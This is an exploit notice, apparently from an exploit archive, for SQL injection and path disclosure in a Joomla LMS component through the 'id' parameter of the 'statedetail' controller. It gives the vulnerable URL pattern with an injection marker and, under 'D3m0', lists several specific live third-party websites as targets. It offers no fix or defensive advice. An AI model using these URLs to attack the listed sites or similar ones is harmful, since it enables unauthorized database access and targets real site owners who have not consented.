Author: KinG Of PiraTeS
Type:: webapps
Platform: php
Developer: http://www.joomlalms.com/
http://extensions.joomla.org/ <
Affected vErsion: All vErsion
Test System: [Windows 7 Edition Int é grale 64bit]
#
1) Introduction
2) defect description
3) exploitation method
>> ----------------------------------------------------------------
1)Introduction
==============
2)Vulnerability Description
===========================
U can inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database.
Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password.
With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
3)Exploit
=========
http://www.bkjia.com /{Path}/index.php?option=com_lms&controller=statedetail&id=-1
[~] P0c [~] :
============
Vuln file in :
http://Localhost/{Path}/index.php?option=com_lms&controller=statedetail&id=[Number] <<-----|
[~] D3m0 [~] :
=============
http://php.esoftech.org/kanerma/index.php?option=com_lms&controller=statedetail&id=1[Inj3ct Here]
http://www.senmedical.com/index.php?option=com_lms&controller=statedetail&id=1[Inj3ct Here]
http://www.najbaro.com/index.php?option=com_lms&controller=statedetail&id=1[Inj3ct Here]
Many Websites are Affected On SQL inJection & Path désclosure
.
.
.
####
Peace From Algeria